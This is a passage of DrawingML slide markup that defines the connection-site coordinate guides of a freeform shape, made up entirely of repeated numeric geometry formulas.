              <a:gd name="connsiteY93" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY145" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY146" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY147" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY148" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY14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139560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880 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY145" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY146" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY147" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY148" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY14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69364 w 1508539"/>
              <a:gd name="connsiteY4" fmla="*/ 6809549 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 101575 w 1508539"/>
              <a:gd name="connsiteY5" fmla="*/ 6715115 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 111426 w 1508539"/>
              <a:gd name="connsiteY6" fmla="*/ 6680170 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 136976 w 1508539"/>
              <a:gd name="connsiteY7" fmla="*/ 6621207 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 153633 w 1508539"/>
              <a:gd name="connsiteY8" fmla="*/ 6596265 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 153512 w 1508539"/>
              <a:gd name="connsiteY9" fmla="*/ 6594818 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 157757 w 1508539"/>
              <a:gd name="connsiteY10" fmla="*/ 6593735 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 160954 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6589172 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 164248 w 1508539"/>
              <a:gd name="connsiteY12" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 164588 w 1508539"/>
              <a:gd name="connsiteY13" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 166997 w 1508539"/>
              <a:gd name="connsiteY14" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 167342 w 1508539"/>
              <a:gd name="connsiteY15" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 169039 w 1508539"/>
              <a:gd name="connsiteY16" fmla="*/ 6553006 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 173735 w 1508539"/>
              <a:gd name="connsiteY17" fmla="*/ 6514360 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 215389 w 1508539"/>
              <a:gd name="connsiteY18" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 226078 w 1508539"/>
              <a:gd name="connsiteY19" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 233311 w 1508539"/>
              <a:gd name="connsiteY20" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 234746 w 1508539"/>
              <a:gd name="connsiteY21" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 239104 w 1508539"/>
              <a:gd name="connsiteY22" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 241880 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 431404 w 1508539"/>
